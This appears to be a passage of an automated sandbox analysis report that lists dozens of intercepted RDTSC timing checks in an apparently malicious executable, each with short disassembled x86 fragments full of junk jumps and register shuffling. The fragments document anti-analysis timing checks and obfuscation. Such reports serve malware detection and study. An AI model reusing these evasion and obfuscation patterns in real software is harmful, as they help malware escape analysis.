Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0916 second address: 70C0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0926 second address: 70C092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C092A second address: 70C092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C092E second address: 70C0934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0934 second address: 70C099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFB28B74676h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bh, 30h 0x00000013 mov dh, al 0x00000015 popad 0x00000016 nop 0x00000017 pushad 0x00000018 pushad 0x00000019 call 00007FFB28B74671h 0x0000001e pop esi 0x0000001f mov si, bx 0x00000022 popad 0x00000023 push edi 0x00000024 mov dx, ax 0x00000027 pop esi 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c jmp 00007FFB28B7466Bh 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C099D second address: 70C09A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C09A1 second address: 70C09A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C09A7 second address: 70C09E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28DE2A18h 0x00000008 pop eax 0x00000009 jmp 00007FFB28DE2A0Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFB28DE2A14h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A66 second address: 70C0A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A6A second address: 70C0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A70 second address: 70C0A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A76 second address: 70C0A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A7A second address: 70C0A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov esi, 6F3E3DB7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0A8C second address: 70C0AA6 instructions: 0x00000000 rdtsc 0x00000002 mov si, FE53h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 1BE12CAFh 0x0000000d popad 0x0000000e test edi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, ABh 0x00000015 mov cx, 9F9Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AA6 second address: 70C0AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFB9703326Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, 8Ah 0x00000014 pushfd 0x00000015 jmp 00007FFB28B74674h 0x0000001a sub cx, 0968h 0x0000001f jmp 00007FFB28B7466Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AF1 second address: 70C0AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AF7 second address: 70C0AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0AFB second address: 70C0B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e jmp 00007FFB28DE2A16h 0x00000013 mov dword ptr [esi+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b pushfd 0x0000001c jmp 00007FFB28DE2A13h 0x00000021 xor cx, 8ABEh 0x00000026 jmp 00007FFB28DE2A19h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B61 second address: 70C0B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B71 second address: 70C0B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0B89 second address: 70C0BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFB28B74670h 0x0000000a jmp 00007FFB28B74675h 0x0000000f popfd 0x00000010 popad 0x00000011 mov ecx, 0CA443C7h 0x00000016 popad 0x00000017 push 00000001h 0x00000019 jmp 00007FFB28B7466Ah 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0BCE second address: 70C0BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0BD4 second address: 70C0BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C89 second address: 70C0C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C8D second address: 70C0C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0C93 second address: 70C0CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28DE2A19h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0CB0 second address: 70C0CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0CB4 second address: 70C0D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b call 00007FFB28DE2A13h 0x00000010 push ecx 0x00000011 pop ebx 0x00000012 pop eax 0x00000013 jmp 00007FFB28DE2A15h 0x00000018 popad 0x00000019 test edi, edi 0x0000001b jmp 00007FFB28DE2A0Eh 0x00000020 js 00007FFB972A13C4h 0x00000026 jmp 00007FFB28DE2A10h 0x0000002b mov eax, dword ptr [ebp-04h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FFB28DE2A0Eh 0x00000035 or cx, 7DD8h 0x0000003a jmp 00007FFB28DE2A0Bh 0x0000003f popfd 0x00000040 push eax 0x00000041 push edx 0x00000042 movzx ecx, dx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D3A second address: 70C0D4B instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D4B second address: 70C0D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D5A second address: 70C0D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D60 second address: 70C0D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D79 second address: 70C0D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 70h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0D80 second address: 70C0DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 83h 0x00000005 pushfd 0x00000006 jmp 00007FFB28DE2A12h 0x0000000b sub ah, FFFFFFF8h 0x0000000e jmp 00007FFB28DE2A0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000001h 0x00000019 jmp 00007FFB28DE2A16h 0x0000001e nop 0x0000001f jmp 00007FFB28DE2A10h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov bl, ah 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0DDC second address: 70C0E48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FFB28B7466Eh 0x0000000b xor ax, 18E8h 0x00000010 jmp 00007FFB28B7466Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a jmp 00007FFB28B74676h 0x0000001f lea eax, dword ptr [ebp-18h] 0x00000022 jmp 00007FFB28B74670h 0x00000027 nop 0x00000028 jmp 00007FFB28B74670h 0x0000002d push eax 0x0000002e pushad 0x0000002f movsx edi, ax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0EA8 second address: 70C0EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 36ACF574h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FFB28DE2A10h 0x00000018 or cx, D728h 0x0000001d jmp 00007FFB28DE2A0Bh 0x00000022 popfd 0x00000023 mov cx, 541Fh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0EE1 second address: 70C0FA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FFB28B74676h 0x00000010 js 00007FFB97032E13h 0x00000016 pushad 0x00000017 mov al, D6h 0x00000019 popad 0x0000001a mov eax, dword ptr [ebp-14h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FFB28B74672h 0x00000024 add cx, 1F18h 0x00000029 jmp 00007FFB28B7466Bh 0x0000002e popfd 0x0000002f mov eax, 77B956CFh 0x00000034 popad 0x00000035 mov ecx, esi 0x00000037 jmp 00007FFB28B74672h 0x0000003c mov dword ptr [esi+0Ch], eax 0x0000003f jmp 00007FFB28B74670h 0x00000044 mov edx, 756006ECh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FFB28B7466Dh 0x00000052 and ecx, 342D3A16h 0x00000058 jmp 00007FFB28B74671h 0x0000005d popfd 0x0000005e jmp 00007FFB28B74670h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C0FA0 second address: 70C1044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FFB28DE2A0Fh 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 jmp 00007FFB28DE2A16h 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FFB28DE2A0Dh 0x00000021 sub ax, 8E36h 0x00000026 jmp 00007FFB28DE2A11h 0x0000002b popfd 0x0000002c popad 0x0000002d test eax, eax 0x0000002f jmp 00007FFB28DE2A0Eh 0x00000034 jne 00007FFB972A10D0h 0x0000003a jmp 00007FFB28DE2A10h 0x0000003f mov edx, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFB28DE2A17h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1044 second address: 70C108F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b pushad 0x0000000c mov esi, 4860A573h 0x00000011 popad 0x00000012 mov dword ptr [edx], eax 0x00000014 jmp 00007FFB28B74672h 0x00000019 mov eax, dword ptr [esi+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FFB28B7466Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C108F second address: 70C109E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C109E second address: 70C10B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C10B6 second address: 70C10FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e jmp 00007FFB28DE2A16h 0x00000013 mov eax, dword ptr [esi+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFB28DE2A17h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C10FC second address: 70C1177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FFB28B7466Eh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 jmp 00007FFB28B74670h 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FFB28B7466Eh 0x00000023 adc ah, FFFFFF88h 0x00000026 jmp 00007FFB28B7466Bh 0x0000002b popfd 0x0000002c mov si, 6BFFh 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFB28B7466Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1177 second address: 70C117B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C117B second address: 70C1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1181 second address: 70C11B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFB28DE2A0Ch 0x00000008 pop esi 0x00000009 mov si, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 jmp 00007FFB28DE2A12h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C11B2 second address: 70C121E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28B74674h 0x00000013 sub ax, C9D8h 0x00000018 jmp 00007FFB28B7466Bh 0x0000001d popfd 0x0000001e push esi 0x0000001f pushfd 0x00000020 jmp 00007FFB28B7466Fh 0x00000025 adc si, 0C9Eh 0x0000002a jmp 00007FFB28B74679h 0x0000002f popfd 0x00000030 pop eax 0x00000031 popad 0x00000032 mov dword ptr [edx+14h], eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1320 second address: 70C1326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1326 second address: 70C132C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C132C second address: 70C1330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1330 second address: 70C1344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 movsx edx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1344 second address: 70C134A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C134A second address: 70C13B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, dword ptr [esi+2Ch] 0x0000000e jmp 00007FFB28B7466Eh 0x00000013 mov dword ptr [edx+2Ch], ecx 0x00000016 pushad 0x00000017 push ecx 0x00000018 mov ecx, edi 0x0000001a pop ebx 0x0000001b mov cl, 34h 0x0000001d popad 0x0000001e mov ax, word ptr [esi+30h] 0x00000022 jmp 00007FFB28B74671h 0x00000027 mov word ptr [edx+30h], ax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FFB28B74678h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13B2 second address: 70C13C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13C1 second address: 70C13C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13C7 second address: 70C13CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13CB second address: 70C13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13CF second address: 70C13F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFB28DE2A18h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C13F9 second address: 70C1467 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, 179E9A60h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [edx+32h], ax 0x00000011 jmp 00007FFB28B7466Fh 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007FFB28B74676h 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 jmp 00007FFB28B74670h 0x00000026 test ecx, 00000700h 0x0000002c jmp 00007FFB28B74670h 0x00000031 jne 00007FFB97032922h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1467 second address: 70C146D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C146D second address: 70C1473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1473 second address: 70C1477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1477 second address: 70C14BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FFB28B74670h 0x00000022 add cx, DEF8h 0x00000027 jmp 00007FFB28B7466Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14BE second address: 70C14C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14C2 second address: 70C14EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 33FD9BC5h 0x0000000b popad 0x0000000c or dword ptr [edx+40h], FFFFFFFFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFB28B74677h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C14EB second address: 70C1542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFB28DE2A13h 0x00000013 sbb cx, 7D7Eh 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1542 second address: 70C1548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 70C1548 second address: 70C154C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D13 second address: 7110D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: 7110D19 second address: 7110D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
